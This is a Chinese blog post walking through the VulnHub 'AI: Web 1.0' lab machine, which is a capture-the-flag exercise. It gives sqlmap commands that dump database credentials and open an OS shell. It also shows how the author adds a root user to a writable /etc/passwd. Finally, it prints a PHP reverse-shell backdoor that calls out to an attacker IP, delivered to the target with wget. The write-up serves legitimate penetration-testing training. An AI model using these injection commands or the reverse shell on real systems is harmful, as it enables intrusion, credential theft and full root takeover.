VulnHub_AI_Web_1.0

一个粗糙的信息收集
使用nmap探测目标主机开放端口
在这里插入图片描述
访问robots.txt
在这里插入图片描述
访问http://192.168.31.126/se3reTdir777/
在这里插入图片描述
猜测可能存在注入点,使用Sqlmap进行探测

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" --dbs

在这里插入图片描述
获取数据库中的表

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 --tables

在这里插入图片描述
获取systemUser表中的字段名

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T systemUser --columns

在这里插入图片描述
获取字段内容

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T systemUser -C "userName,password" --dump

在这里插入图片描述
获取user表中内容
在这里插入图片描述
在数据库中没有获得有价值的信息
扫一下网站目录,找到一个info.php
在这里插入图片描述
访问页面发现是phpinfo
在这里插入图片描述
找到网站的物理路径
在这里插入图片描述
使用sqlmap获取shell

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" --os-shell 
# 网站路径 
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

在这里插入图片描述
查看/etc/passwd权限,发现可以写入
在这里插入图片描述
使用卡里自带的openssl加密一下我们自己的账户
在这里插入图片描述
写入用户,UID,GID为0,根目录为root
在这里插入图片描述
尝试切换到test用户时提示需要一个终端
在这里插入图片描述
在本地写一个后门,使用wget下载的靶机

<?php
$sock=fsockopen("192.168.126.233",9966);
exec("/bin/sh -i <&3 >&3 2>&3");
?>

在这里插入图片描述
使用python搭建一个HTTP服务器

python -m SimpleHTTPServer 8080

在这里插入图片描述
使用wget下载到靶机
在这里插入图片描述
执行刚刚上传的文件
在这里插入图片描述
看到反弹回来一个shell
在这里插入图片描述
使用python创建一个交互式shell
在这里插入图片描述
切换用户,查看权限已经是root用户
在这里插入图片描述
查看flag
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值